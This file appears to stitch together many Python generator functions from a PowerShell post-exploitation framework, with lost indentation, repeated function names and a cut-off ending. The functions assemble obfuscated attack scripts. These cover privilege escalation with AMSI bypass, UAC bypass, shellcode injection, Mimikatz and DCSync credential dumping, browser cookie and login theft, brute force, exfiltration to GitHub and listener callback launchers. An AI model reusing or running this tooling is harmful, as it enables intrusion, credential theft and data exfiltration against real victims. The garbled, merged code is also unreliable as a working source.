def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# Set booleans to false by default
obfuscate = False
# staging options
if (params['Obfuscate']).lower() == 'true':
obfuscate = True
obfuscate_command = params['ObfuscateCommand']
module_name = 'Write-HijackDll'
# read in the common powerup.ps1 module source code
module_source = main_menu.installPath + "/data/module_source/privesc/PowerUp.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source", "obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
module_code = f.read()
f.close()
# # get just the code needed for the specified function
# script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
script = module_code
script_end = ';' + module_name + " "
# extract all of our options
listener_name = params['Listener']
user_agent = params['UserAgent']
proxy = params['Proxy']
proxy_creds = params['ProxyCreds']
# generate the launcher code
launcher = main_menu.stagers.generate_launcher(listener_name, language='powershell', encode=True,
obfuscate=obfuscate,
obfuscationCommand=obfuscate_command, userAgent=user_agent,
proxy=proxy,
proxyCreds=proxy_creds, bypasses=params['Bypasses'])
if launcher == "":
return handle_error_message("[!] Error in launcher command generation.")
else:
out_file = params['DllPath']
script_end += " -Command \"%s\"" % (launcher)
script_end += " -DllPath %s" % (out_file)
outputf = params.get("OutputFunction", "Out-String")
script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(module.name.split("/")[-1]) + ' completed!"'
if obfuscate:
script_end = helpers.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/code_execution/Invoke-ShellcodeMSIL.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source", "obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
module_code = f.read()
f.close()
script = module_code
script_end = "Invoke-ShellcodeMSIL"
for option,values in params.items():
if option.lower() != "agent":
if values and values != '':
if option.lower() == "shellcode":
# transform the shellcode to the correct format
sc = ",0".join(values.split("\\"))[1:]
script_end += " -" + str(option) + " @(" + sc + ")"
if obfuscate:
script_end = helpers.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def preobfuscate_modules(self, obfuscation_command, reobfuscate=False):
"""
Preobfuscate PowerShell module_source files
"""
if not data_util.is_powershell_installed():
print(
helpers.color(
"[!] PowerShell is not installed and is required to use obfuscation, please install it first."
))
return
# Preobfuscate all module_source files
files = [file for file in helpers.get_module_source_files()]
for file in files:
file = os.getcwd() + '/' + file
if reobfuscate or not data_util.is_obfuscated(file):
message = "[*] Obfuscating {}...".format(
os.path.basename(file))
signal = json.dumps({
'print': True,
'message': message,
'obfuscated_file': os.path.basename(file)
})
dispatcher.send(signal, sender="empire")
else:
print(
helpers.color(
"[*] " + os.path.basename(file) +
" was already obfuscated. Not reobfuscating."))
data_util.obfuscate_module(file, obfuscation_command, reobfuscate)
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
module_source = main_menu.installPath + "/data/module_source/collection/Get-SharpChromium.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source,
obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source",
"obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
module_code = f.read()
f.close()
script = module_code
script_end = " Get-SharpChromium"
#check type
if params['Type'].lower() not in [
'all', 'logins', 'history', 'cookies'
]:
print(
helpers.color(
"[!] Invalid value of Type, use default value: all"))
params['Type'] = 'all'
script_end += " -Type " + params['Type']
#check domain
if params['Domains'].lower() != '':
if params['Type'].lower() != 'cookies':
print(
helpers.color(
"[!] Domains can only be used with Type cookies"))
else:
script_end += " -Domains ("
for domain in params['Domains'].split(','):
script_end += "'" + domain + "',"
script_end = script_end[:-1]
script_end += ")"
outputf = params.get("OutputFunction", "Out-String")
script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(
module.name.split("/")[-1]) + ' completed!"'
if obfuscate:
script_end = helpers.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/recon/Find-Fruit.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source,
obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source",
"obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
module_code = f.read()
f.close()
script = module_code
script_end = "\nFind-Fruit"
show_all = params['ShowAll'].lower()
for option, values in params.items():
if option.lower() != "agent" and option.lower(
) != "showall" and option.lower() != "outputfunction":
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script_end += " -" + str(option)
else:
script_end += " -" + str(option) + " " + str(values)
if show_all != "true":
script_end += " | ?{$_.Status -eq 'OK'}"
script_end += " | Format-Table -AutoSize"
outputf = params.get("OutputFunction", "Out-String")
script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(
module.name.split("/")[-1]) + ' completed!"'
if obfuscate:
script_end = helpers.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def _generate_script_powershell(self, module: PydanticModule, params: Dict, obfuscate=False, obfuscate_command='') \
-> Tuple[Optional[str], Optional[str]]:
if module.script_path:
# Get preobfuscated module code
if obfuscate:
data_util.obfuscate_module(
moduleSource=module.script_path,
obfuscationCommand=obfuscate_command)
module_source = module.script_path.replace(
"module_source", "obfuscated_module_source")
with open(module_source, 'r') as stream:
script = stream.read()
else:
with open(module.script_path, 'r') as stream:
script = stream.read()
else:
script = module.script
script_end = f" {module.script_end} "
option_strings = []
# This is where the code goes for all the modules that do not have a custom generate function.
for key, value in params.items():
if key.lower() not in ["agent", "computername", "outputfunction"]:
if value and value != '':
if value.lower() == "true":
# if we're just adding a switch
# wannabe mustache templating.
# If we want to get more advanced, we can import a library for it.
this_option = module.advanced.option_format_string_boolean \
.replace('{{ KEY }}', str(key)) \
.replace('{{KEY}}', str(key))
option_strings.append(f'{this_option}')
else:
this_option = module.advanced.option_format_string \
.replace('{{ KEY }}', str(key)) \
.replace('{{KEY}}', str(key)) \
.replace('{{ VALUE }}', str(value)) \
.replace('{{VALUE}}', str(value))
option_strings.append(f'{this_option}')
script_end = script_end \
.replace('{{ PARAMS }}', ' '.join(option_strings)) \
.replace('{{PARAMS}}', ' '.join(option_strings)) \
.replace('{{ OUTPUT_FUNCTION }}', params.get('OutputFunction', 'Out-String')) \
.replace('{{OUTPUT_FUNCTION}}', params.get('OutputFunction', 'Out-String'))
script += script_end
if obfuscate:
script = helpers.obfuscate(self.main_menu.installPath,
psScript=script,
obfuscationCommand=obfuscate_command)
script = data_util.keyword_obfuscation(script)
return script, None
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False,
obfuscation_command: str = ""):
# Set booleans to false by default
obfuscate = False
listenerName = params['Listener']
# staging options
userAgent = params['UserAgent']
proxy = params['Proxy']
proxyCreds = params['ProxyCreds']
if (params['Obfuscate']).lower() == 'true':
obfuscate = True
ObfuscateCommand = params['ObfuscateCommand']
# read in the common module source code
moduleSource = main_menu.installPath + "/data/module_source/privesc/Invoke-EventVwrBypass.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscation_command)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
return handle_error_message("[!] Could not read module source path at: " + str(moduleSource))
moduleCode = f.read()
f.close()
script = moduleCode
if not main_menu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
return handle_error_message("[!] Invalid listener: " + listenerName)
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = main_menu.stagers.generate_launcher(listenerName, language='powershell', encode=True,
obfuscate=obfuscate,
obfuscationCommand=ObfuscateCommand, userAgent=userAgent,
proxy=proxy,
proxyCreds=proxyCreds, bypasses=params['Bypasses'])
encScript = launcher.split(" ")[-1]
if launcher == "":
return handle_error_message("[!] Error in launcher generation.")
else:
scriptEnd = "Invoke-EventVwrBypass -Command \"%s\"" % (encScript)
if obfuscate:
scriptEnd = helpers.obfuscate(main_menu.installPath, psScript=scriptEnd,
obfuscationCommand=obfuscation_command)
script += scriptEnd
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
Passlist = params['Passlist']
Verbose = params['Verbose']
ServerType = params['ServerType']
Loginacc = params['Loginacc']
Loginpass = params['Loginpass']
print(helpers.color("[+] Initiated using passwords: " + str(Passlist)))
# if you're reading in a large, external script that might be updates,
# use the pattern below
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/recon/Fetch-And-Brute-Local-Accounts.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source,
obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source",
"obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
module_code = f.read()
f.close()
script = module_code
script_end = " Fetch-Brute"
if len(ServerType) >= 1:
script_end += " -st " + ServerType
script_end += " -pl " + Passlist
if len(Verbose) >= 1:
script_end += " -vbse " + Verbose
if len(Loginacc) >= 1:
script_end += " -lacc " + Loginacc
if len(Loginpass) >= 1:
script_end += " -lpass " + Loginpass
if obfuscate:
script_end = helpers.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
print(helpers.color("[+] Command: " + str(script_end)))
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
username = params['Username']
password = params['Password']
instance = params['Instance']
no_defaults = params['NoDefaults']
check_all = params['CheckAll']
script_end = ""
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/collection/Get-SQLColumnSampleData.ps1"
script = ""
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command)
script = module_source.replace("module_source", "obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if check_all:
aux_module_source = main_menu.installPath + "/data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=aux_module_source, obfuscationCommand=obfuscation_command)
aux_module_source = module_source.replace("module_source", "obfuscated_module_source")
try:
with open(aux_module_source, 'r') as auxSource:
auxScript = auxSource.read()
script += " " + auxScript
except:
print(helpers.color("[!] Could not read additional module source path at: " + str(aux_module_source)))
script_end = " Get-SQLInstanceDomain "
if username != "":
script_end += " -Username "+username
if password != "":
script_end += " -Password "+password
script_end += " | "
script_end += " Get-SQLColumnSampleData"
if username != "":
script_end += " -Username "+username
if password != "":
script_end += " -Password "+password
if instance != "" and not check_all:
script_end += " -Instance "+instance
if no_defaults:
script_end += " -NoDefaults "
outputf = params.get("OutputFunction", "Out-String")
script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(module.name.split("/")[-1]) + ' completed!"'
if obfuscate:
script_end = helpers.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# read in the common powerup.ps1 module source code
module_source = main_menu.installPath + "/data/module_source/privesc/PowerUp.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source", "obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
module_code = f.read()
f.close()
service_name = params['ServiceName']
# # get just the code needed for the specified function
# script = helpers.generate_dynamic_powershell_script(moduleCode, "Write-ServiceEXECMD")
script = module_code
# generate the .bat launcher code to write out to the specified location
launcher = main_menu.stagers.stagers['windows/launcher_bat']
launcher.options['Listener'] = params['Listener']
launcher.options['UserAgent'] = params['UserAgent']
launcher.options['Proxy'] = params['Proxy']
launcher.options['ProxyCreds'] = params['ProxyCreds']
launcher.options['ObfuscateCommand'] = params['ObfuscateCommand']
launcher.options['Obfuscate'] = params['Obfuscate']
launcher.options['Bypasses'] = params['Bypasses']
if params['Delete'].lower() == "true":
launcher.options['Delete'] = "True"
else:
launcher.options['Delete'] = "False"
launcher_code = launcher.generate()
# PowerShell code to write the launcher.bat out
script_end = ";$tempLoc = \"$env:temp\\debug.bat\""
script_end += "\n$batCode = @\"\n" + launcher_code + "\"@\n"
script_end += "$batCode | Out-File -Encoding ASCII $tempLoc ;\n"
script_end += "\"Launcher bat written to $tempLoc `n\";\n"
if launcher_code == "":
return handle_error_message("[!] Error in launcher .bat generation.")
else:
script_end += "\nInstall-ServiceBinary -ServiceName \""+str(service_name)+"\" -Command \"C:\\Windows\\System32\\cmd.exe /C $tempLoc\""
if obfuscate:
script_end = helpers.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
# First method: Read in the source script from module_source
moduleSource = main_menu.installPath + "/data/module_source/situational_awareness/host/Invoke-Seatbelt.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscation_command)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(moduleSource))
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = 'Invoke-Seatbelt -Command "'
# Add any arguments to the end execution of the script
if params['Command']:
scriptEnd += " " + str(params['Command'])
if params['Group']:
scriptEnd += " -group=" + str(params['Group'])
if params['Computername']:
scriptEnd += " -computername=" + str(params['Computername'])
if params['Username']:
scriptEnd += " -username="******" -password="******" -full"
if params['Quiet'].lower() == 'true':
scriptEnd += " -q"
scriptEnd = scriptEnd.replace('" ', '"')
scriptEnd += '"'
if obfuscate:
scriptEnd = helpers.obfuscate(
psScript=scriptEnd,
installPath=main_menu.installPath,
obfuscationCommand=obfuscation_command)
script += scriptEnd
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
username = params['Username']
password = params['Password']
instance = params['Instance']
check_all = params['CheckAll']
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/recon/Get-SQLServerLoginDefaultPw.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
if check_all:
module_source = main_menu.installPath + "/data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source", "obfuscated_module_source")
try:
with open(module_source, 'r') as auxSource:
aux_script = auxSource.read()
script += " " + aux_script
except:
print(helpers.color("[!] Could not read additional module source path at: " + str(module_source)))
script_end = " Get-SQLInstanceDomain "
if username != "":
script_end += " -Username "+username
if password != "":
script_end += " -Password "+password
script_end += " | Select Instance | "
script_end += " Get-SQLServerLoginDefaultPw"
if instance != "" and not check_all:
script_end += " -Instance "+instance
# Get the random function name generated at install and patch the stager with the proper function name
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# if you're reading in a large, external script that might be updates,
# use the pattern below
# read in the common module source code
moduleSource = (
self.mainMenu.installPath
+ "/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1"
)
if obfuscate:
data_util.obfuscate_module(
moduleSource=moduleSource, obfuscationCommand=obfuscationCommand
)
moduleSource = moduleSource.replace(
"module_source", "obfuscated_module_source"
)
try:
f = open(moduleSource, "r")
except:
return handle_error_message(
"[!] Could not read module source path at: " + str(moduleSource)
)
moduleCode = f.read()
f.close()
script = moduleCode
# Need to actually run the module that has been loaded
scriptEnd = "Invoke-ExfilDataToGitHub"
# add any arguments to the end execution of the script
for option, values in self.options.items():
if option.lower() != "agent":
if values["Value"] and values["Value"] != "":
if values["Value"].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += (
" -" + str(option) + ' "' + str(values["Value"]) + '"'
)
if obfuscate:
scriptEnd = helpers.obfuscate(
psScript=scriptEnd,
installPath=self.mainMenu.installPath,
obfuscationCommand=obfuscationCommand,
)
script += scriptEnd
# Get the random function name generated at install and patch the stager with the proper function name
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source", "obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
module_code = f.read()
f.close()
list_tokens = params['list']
elevate = params['elevate']
revert = params['revert']
admin = params['admin']
domainadmin = params['domainadmin']
user = params['user']
processid = params['id']
script = module_code
script_end = "Invoke-Mimikatz -Command "
if revert.lower() == "true":
script_end += "'\"token::revert"
else:
if list_tokens.lower() == "true":
script_end += "'\"token::list"
elif elevate.lower() == "true":
script_end += "'\"token::elevate"
else:
return handle_error_message("[!] list, elevate, or revert must be specified!")
if domainadmin.lower() == "true":
script_end += " /domainadmin"
elif admin.lower() == "true":
script_end += " /admin"
elif user.lower() != "":
script_end += " /user:"******"":
script_end += " /id:" + str(processid)
script_end += "\"';"
if obfuscate:
script_end = helpers.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
module_source = main_menu.installPath + "/data/module_source/privesc/Invoke-MS16032.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source,
obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source",
"obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
module_code = f.read()
f.close()
script = module_code
# generate the launcher code without base64 encoding
launcher = main_menu.stagers.stagers['multi/launcher']
launcher.options['Listener'] = params['Listener']
launcher.options['UserAgent'] = params['UserAgent']
launcher.options['Proxy'] = params['Proxy']
launcher.options['ProxyCreds'] = params['ProxyCreds']
launcher.options['SafeChecks'] = 'False'
launcher.options['ScriptLogBypass'] = '******'
launcher.options['AMSIBypass'] = '******'
launcher.options['Base64'] = 'False'
launcher_code = launcher.generate()
# need to escape characters
launcher_code = launcher_code.replace("`", "``").replace("$",
"`$").replace(
"\"", "'")
script_end = 'Invoke-MS16-032 "' + launcher_code + '"'
script_end += ';"`nInvoke-MS16032 completed."'
if obfuscate:
script_end = helpers.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
module_source = main_menu.installPath + "/data/module_source/privesc/Invoke-MS16032.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source,
obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source",
"obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
module_code = f.read()
f.close()
script = module_code
# generate the launcher code without base64 encoding
listener_name = params['Listener']
user_agent = params['UserAgent']
proxy = params['Proxy']
proxy_creds = params['ProxyCreds']
# generate the PowerShell one-liner with all of the proper options set
launcher = main_menu.stagers.generate_launcher(listener_name,
language='powershell',
encode=False,
userAgent=user_agent,
proxy=proxy,
proxyCreds=proxy_creds)
# need to escape characters
launcher_code = launcher.replace("`", "``").replace("$", "`$").replace(
"\"", "'")
script_end = 'Invoke-MS16-032 "' + launcher_code + '"'
script_end += ';"`nInvoke-MS16032 completed."'
if obfuscate:
script_end = helpers.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-DCSync.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source,
obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source",
"obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
module_code = f.read()
f.close()
script = module_code
script_end = "Invoke-DCSync -PWDumpFormat "
if params["Domain"] != '':
script_end += " -Domain " + params['Domain']
if params["Forest"] != '':
script_end += " -DumpForest "
if params["Computers"] != '':
script_end += " -GetComputers "
if params["Active"] == '':
script_end += " -OnlyActive:$false "
outputf = params.get("OutputFunction", "Out-String")
script_end += f" | {outputf};"
if obfuscate:
script_end = helpers.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/collection/Out-Minidump.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source,
obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source",
"obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
module_code = f.read()
f.close()
script = module_code
script_end = ""
for option, values in params.items():
if option.lower() != "agent":
if values and values != '':
if option == "ProcessName":
script_end = "Get-Process " + values + " | Out-Minidump"
elif option == "ProcessId":
script_end = "Get-Process -Id " + values + " | Out-Minidump"
for option, values in params.items():
if values and values != '':
if option != "Agent" and option != "ProcessName" and option != "ProcessId":
script_end += " -" + str(option) + " " + str(values)
if obfuscate:
script_end = helpers.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
# First method: Read in the source script from module_source
module_source = main_menu.installPath + "/data/module_source/collection/Invoke-WireTap.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source,
obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source",
"obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
module_code = f.read()
f.close()
script = module_code
script_end = 'Invoke-WireTap -Command "'
# Add any arguments to the end execution of the script
for option, values in params.items():
if option.lower() != "agent":
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script_end += str(option)
elif option.lower() == "time":
# if we're just adding a switch
script_end += " " + str(values)
else:
script_end += " " + str(option) + " " + str(values)
script_end += '"'
if obfuscate:
script_end = helpers.obfuscate(
psScript=script_end,
installPath=main_menu.installPath,
obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
module_name = 'Get-EmailItems'
folder_name = params['FolderName']
max_emails = params['MaxEmails']
# read in the common powerview.ps1 module source code
module_source = main_menu.installPath + "/data/module_source/management/MailRaider.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source,
obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source",
"obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
module_code = f.read()
f.close()
script = module_code + "\n"
script_end = "Get-OutlookFolder -Name '%s' | Get-EmailItems -MaxEmails %s" % (
folder_name, max_emails)
outputf = params.get("OutputFunction", "Out-String")
script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(
module.name.split("/")[-1]) + ' completed!"'
if obfuscate:
script_end = helpers.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source,
obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source",
"obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
moduleCode = f.read()
f.close()
script = moduleCode
# ridiculous escape format
groups = " ".join([
'"\\""' + group.strip().strip("'\"") + '"""'
for group in params["Groups"].split(",")
])
# build the custom command with whatever options we want
command = '""misc::addsid ' + params["User"] + ' ' + groups
# base64 encode the command to pass to Invoke-Mimikatz
scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(
main_menu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscation_command)
script += scriptEnd
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
module_name = 'Disable-SecuritySettings'
reset = params['Reset']
# read in the common powerview.ps1 module source code
module_source = main_menu.installPath + "/data/module_source/management/MailRaider.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source", "obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
module_code = f.read()
f.close()
script = module_code + "\n"
script_end = ""
if reset.lower() == "true":
# if the flag is set to restore the security settings
script_end += "Reset-SecuritySettings "
else:
script_end += "Disable-SecuritySettings "
for option,values in params.items():
if option.lower() != "agent" and option.lower() != "reset" and option.lower() != "outputfunction":
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script_end += " -" + str(option)
else:
script_end += " -" + str(option) + " " + str(values)
outputf = params.get("OutputFunction", "Out-String")
script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(module.name.split("/")[-1]) + ' completed!"'
if obfuscate:
script_end = helpers.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source,
obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source",
"obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
module_code = f.read()
f.close()
script = module_code
script_end = "Invoke-Mimikatz -Command "
if params['Username'] != '':
script_end += "'\"lsadump::lsa /inject /name:" + params['Username']
else:
script_end += "'\"lsadump::lsa /patch"
script_end += "\"';"
if obfuscate:
script_end = helpers.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
module_source = main_menu.installPath + "/data/module_source/management/Invoke-RunAs.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source,
obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source",
"obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
script = f.read()
f.close()
script_end = "\nInvoke-RunAs "
# if a credential ID is specified, try to parse
cred_id = params["CredID"]
if cred_id != "":
if not main_menu.credentials.is_credential_valid(cred_id):
return handle_error_message("[!] CredID is invalid!")
cred: Credential = main_menu.credentials.get_credentials(cred_id)
if cred.credtype != "plaintext":
return handle_error_message(
"[!] A CredID with a plaintext password must be used!")
if cred.domain != "":
params["Domain"] = cred.domain
if cred.username != "":
params["UserName"] = cred.username
